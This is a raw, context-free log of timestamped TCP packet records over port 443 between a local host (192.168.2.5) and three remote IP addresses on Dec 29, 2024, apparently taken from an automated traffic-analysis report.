                                                                                                                  Dec 29, 2024 08:55:54.729670048 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:54.729721069 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:54.729778051 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:54.729784966 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:55.648839951 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:55.649137974 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:55.649215937 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:55.649286985 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:55.649306059 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:55.837192059 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:55.837222099 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:55.837295055 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:55.837575912 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:55.837589025 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:57.103107929 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:57.103189945 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:57.104336977 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:57.104345083 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:57.105096102 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:57.106264114 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:57.106403112 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:57.106452942 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:57.106543064 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:57.106549025 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:58.138683081 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:58.138979912 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:58.139045000 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:58.139219999 CET49759443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:58.139235020 CET44349759172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:58.497939110 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:58.497982979 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:58.498055935 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:58.498394966 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:58.498406887 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:59.908449888 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:59.908521891 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:59.910036087 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:59.910044909 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:59.910365105 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:59.911691904 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:59.911773920 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:59.911780119 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:02.938755035 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:02.939026117 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:02.939095974 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:02.944444895 CET49765443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:02.944463968 CET44349765172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:03.405170918 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:03.405211926 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:03.405280113 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:03.405829906 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:03.405849934 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:04.717245102 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:04.717397928 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:04.718616962 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:04.718622923 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:04.719012976 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:04.728063107 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:04.728197098 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:04.728203058 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:05.627351046 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:05.627614975 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:05.627672911 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:05.627747059 CET49776443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:05.627760887 CET44349776172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:05.662883043 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:05.662921906 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:05.662992954 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:05.663463116 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:05.663471937 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:06.928137064 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:06.928220034 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:06.929433107 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:06.929440022 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:06.929641008 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:06.930829048 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:06.930850983 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:06.930888891 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:07.759871006 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:07.760113001 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:07.760282993 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:07.763575077 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:07.763587952 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:07.763607979 CET49782443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:56:07.763612986 CET44349782172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:08.289736986 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:08.289783955 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:08.289851904 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:08.290767908 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:08.290781021 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:09.928587914 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:09.928693056 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:09.930849075 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:09.930856943 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:09.931106091 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:09.932341099 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:09.975368977 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:10.451389074 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:10.451462984 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:10.451596975 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:10.451684952 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:10.451694012 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:10.451704025 CET49788443192.168.2.5185.161.251.21
                                                                                                                  Dec 29, 2024 08:56:10.451709032 CET44349788185.161.251.21192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:11.078557014 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:11.078597069 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:11.078661919 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:11.078980923 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:11.078994036 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:12.389617920 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:12.389676094 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:12.392086983 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:12.392095089 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:12.392339945 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:12.393943071 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:12.435378075 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.004793882 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.004841089 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.004874945 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.004908085 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.004916906 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.004926920 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.004954100 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.005008936 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.005049944 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.005058050 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.016184092 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.016249895 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.016257048 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.024507046 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.024575949 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.024585009 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.075391054 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.124341011 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.169132948 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.169143915 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.216001034 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.216008902 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.220298052 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.220360994 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.220371008 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.227844000 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.227894068 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.227900982 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.235387087 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.235497952 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.235505104 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.242882967 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.242932081 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.242938995 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.250453949 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.250508070 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.250516891 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.257911921 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.257961988 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.257970095 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.265439034 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.265501022 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.265508890 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.272399902 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.272450924 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.272458076 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.279498100 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.282330990 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.282337904 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.293248892 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.293329000 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.293396950 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.293405056 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.293461084 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.300225019 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.334619999 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.338361979 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.338371992 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.387897968 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.425898075 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.428251982 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.430278063 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.430288076 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.437777996 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.437788010 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.437860966 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.437869072 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.447238922 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.447309971 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.447319984 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.447377920 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.451956034 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.452025890 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.461330891 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.461343050 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.461416960 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.469299078 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.469338894 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.469398022 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.472632885 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.472640991 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.472693920 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.478956938 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.478965044 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.479054928 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.485356092 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.485459089 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.491786003 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.491849899 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.495105982 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.495171070 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.502314091 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.502392054 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.504842997 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.504903078 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.512756109 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.512814045 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.515983105 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.516050100 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.637470007 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.637576103 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.640280962 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.640348911 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.647480965 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.647548914 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.650016069 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.650082111 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.652538061 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.652597904 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.657355070 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.657430887 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.659864902 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.659929991 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.664745092 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.664835930 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.669498920 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.669580936 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.674427986 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.674530983 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.676980019 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.677069902 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.682312012 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.682387114 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.685112953 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.685179949 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.689877033 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.689953089 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.693466902 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.693531990 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.697665930 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.697738886 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.702461004 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.702522993 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.707330942 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.707405090 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.709856987 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.709932089 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.714864016 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.714941025 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.717403889 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.717461109 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.721991062 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.722064018 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.726766109 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.726836920 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.756975889 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.757083893 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.760621071 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.760699034 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.765480042 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.765557051 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.849981070 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.850008965 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.850064993 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.850064993 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.850125074 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.850141048 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.863140106 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.863183975 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.863214970 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.863224983 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.863259077 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.874454975 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.874500036 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.874531031 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.874545097 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.874566078 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.885287046 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.885330915 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.885415077 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.885427952 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.892704010 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.892750025 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.892786026 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.892797947 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.892827988 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.899681091 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.899739027 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.899755001 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.899768114 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.899807930 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.907183886 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.907229900 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.907249928 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.907262087 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.907285929 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.913711071 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.913755894 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.913779974 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.913789988 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:13.913942099 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:13.971137047 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:14.062246084 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:14.062289000 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:14.062316895 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:14.062351942 CET44349796172.67.208.58192.168.2.5
